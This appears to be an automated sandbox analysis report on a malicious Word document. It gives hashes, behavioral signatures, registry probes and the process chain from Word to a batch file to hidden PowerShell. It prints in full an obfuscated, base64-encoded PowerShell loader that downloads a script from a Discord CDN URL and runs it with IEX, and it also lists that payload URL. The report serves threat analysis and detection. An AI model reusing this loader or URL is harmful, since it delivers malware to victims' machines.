Analysis
-
max time kernel
122s -
max time network
135s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
14-10-2021 18:35
Static task
static1
Behavioral task
behavioral1
Sample
ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc
Resource
win10-en-20211014
General
-
Target
ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc
-
Size
31KB
-
MD5
da6419e4d4e4528990898bcfdaa85e01
-
SHA1
8fdfe23dac4252203c5b7f9ff8b4778676188ca2
-
SHA256
ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d
-
SHA512
2a0e6ce142058fc73fa968a705be71768b2a183610610f5715792b25a1f699df10e1eb745772deaa74322fa8f8237eb7be82d7d2657baccd602605cfcee818e0
Malware Config
Extracted
https://cdn.discordapp.com/attachments/851105085270523917/895674622702399538/Server.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1352 2272 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 25 2104 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2272 WINWORD.EXE 2272 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2104 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2272 wrote to memory of 1352 2272 WINWORD.EXE cmd.exe PID 2272 wrote to memory of 1352 2272 WINWORD.EXE cmd.exe PID 1352 wrote to memory of 2104 1352 cmd.exe powershell.exe PID 1352 wrote to memory of 2104 1352 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ad0972d2a239b3ba4cbe61079c530624e16e8e57159ce21796b3e711888c997d.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\zexo.bat" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoweRSheLL.eXe -executIonPOLIcY ByPaSs -nOProfILe -WIndoWSTYLe HiDdeN -E JABTAFoAWABEAEMARgBWAEcAQgBIAE4ASgBTAEQARgBHAEgAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwA4ADUAMQAxADAANQAwADgANQAyADcAMAA1ADIAMwA5ADEANwAvADgAOQA1ADYANwA0ADYAMgAyADcAMAAyADMAOQA5ADUAMwA4AC8AUwBlAHIAdgBlAHIALgB0AHgAdAAnADsADQAKACQARQBEAFIARgBHAEgATgBKAE0ASwBEAEUARgBHAEgASgAgAD0AIAAnAG4ARQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAEUAYgBDACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAVAAnAC4AUgBlAHAAbABhAGMAZQAoACcALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAnACwAJwB0AC4AVwAnACkALgBSAGUAcABsAGEAYwBlACgAJwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACcALAAnAGwASQBFAE4AJwApADsADQAKACQAUwBYAEQAQwBGAFYARwBCAEgATgBKAFgARABDAEYAVgBHAEIASABKAEsAIAA9ACAAJwBEAE8AKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgBhAEQAUwBUADwAPAA8ADwAPAA8ADwAPAA8AD4APgA+AD4APgA+AD4APgA+AD4APgBHACcALgBSAGUAcABsAGEAYwBlACgAJwAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACcALAAnAFcAbgBMAG8AJwApAC4AUgBlAHAAbABhAGMAZQAoACcAPAA8ADwAPAA8ADwAPAA8ADwAPgA+AD4APgA+AD4APgA+AD4APgA+ACcALAAnAHIASQBuACcAKQA7AA0ACgAkAFMAVwBYAEQARQBDAFIARgBHAFkASABVAEoASQBTAEQARgBWAEcASABKACAAPQAnAEkAYABFAFgAKABuAGAALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQBgAGMAYABUACAAJABFAEQAUgBGAEcASABOAEoATQBLAEQAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8AD4APgA+AD4APgA+AD4APgA+AD4APgA+AD4APgBHAEIASABOAEoAUwBEAEYARwBIACkAJwAuAFIAZQBwAGwAYQBjAGUAKAAnAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0AJwAsACcAZQBgAFcAYAAtAE8AYgBqAGAARQAnACkALgBSAGUAcABsAGEAYwBlACgAJwA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPAA8ADwAPgA+AD4APgA+AD4APgA+AD4APgA+AD4APgA+ACcALAAnAEUARgBHAEgASgApAC4AJABTAFgARABDAEYAVgBHAEIASABOAEoAWABEAEMARgBWAEcAQgBIAEoASwAoACQAUwBaAFgARABDAEYAVgAnACkAOwANAAoAJgAoACcASQAnACsAJwBFAFgAJwApACgAJABTAFcAWABEAEUAQwBSAEYARwBZAEgAVQBKAEkAUwBEAEYAVgBHAEgASgAgAC0ASgBvAGkAbgAgACcAJwApAHwAJgAoACcASQAnACsAJwBFAFgAJwApADsA"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\zexo.batMD5
a685d75068195fb660a916c72d1ffbcc
SHA17444ec315ba2439a0388415074667739323541c6
SHA256cc5a024786036aa094718ecc292f781bceed4cd6636885f4eec0ba285bd24570
SHA512ba66ecea4e5179be1b8670d3e14cf6cfafe6b98b7b0527c79398c3adc026bb82e38284392f712499cbf2cd6afe4325844a244662f129df3767a2cb7c88b62397
-
memory/1352-254-0x0000000000000000-mapping.dmp
-
memory/2104-300-0x000002ECDF988000-0x000002ECDF989000-memory.dmpFilesize
4KB
-
memory/2104-289-0x000002ECDF986000-0x000002ECDF988000-memory.dmpFilesize
8KB
-
memory/2104-269-0x000002ECDF983000-0x000002ECDF985000-memory.dmpFilesize
8KB
-
memory/2104-268-0x000002ECDF980000-0x000002ECDF982000-memory.dmpFilesize
8KB
-
memory/2104-256-0x0000000000000000-mapping.dmp
-
memory/2272-118-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmpFilesize
64KB
-
memory/2272-122-0x000002034CC90000-0x000002034CC92000-memory.dmpFilesize
8KB
-
memory/2272-121-0x000002034CC90000-0x000002034CC92000-memory.dmpFilesize
8KB
-
memory/2272-120-0x000002034CC90000-0x000002034CC92000-memory.dmpFilesize
8KB
-
memory/2272-119-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmpFilesize
64KB
-
memory/2272-115-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmpFilesize
64KB
-
memory/2272-117-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmpFilesize
64KB
-
memory/2272-116-0x00007FF821CC0000-0x00007FF821CD0000-memory.dmpFilesize
64KB